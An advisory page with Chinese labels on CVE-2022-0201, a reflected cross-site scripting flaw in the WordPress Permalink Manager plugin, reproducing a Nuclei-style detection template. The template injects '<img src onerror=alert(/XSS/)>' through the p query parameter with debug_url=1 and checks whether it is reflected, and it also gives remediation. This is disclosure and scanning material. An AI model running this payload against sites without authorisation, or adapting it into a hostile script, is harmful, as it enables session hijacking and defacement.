CVE-2022-0201: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress Permalink Manager | POC: 已公开

漏洞描述

WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page.

PoC代码[已公开]

id: CVE-2022-0201

info:
  name: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: |
    WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update to WordPress Permalink Manager version 2.2.15 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4
    - https://plugins.trac.wordpress.org/changeset/2656512
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0201
    cwe-id: CWE-79
    epss-score: 0.19807
    epss-percentile: 0.95249
    cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: permalink_manager_lite_project
    product: permalink_manager_lite
    framework: wordpress
  tags: cve,cve2022,wp-plugin,wpscan,xss,wordpress,permalink_manager_lite_project

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src onerror=alert(/XSS/)>'
          - 'pm_query'
        condition: and

      - type: word
        part: header
        words:
          - text/html
# digest: 4a0a0047304502205eea4f3667272fd5ec2048c6ceb807c3297a74002617bf5535ec13fef5c8960602210097a0c790727123217917f2fdd9e51937806a400bbf900630ccbd4f2f5f240550:922c64590222798bb761d5b6d8e72950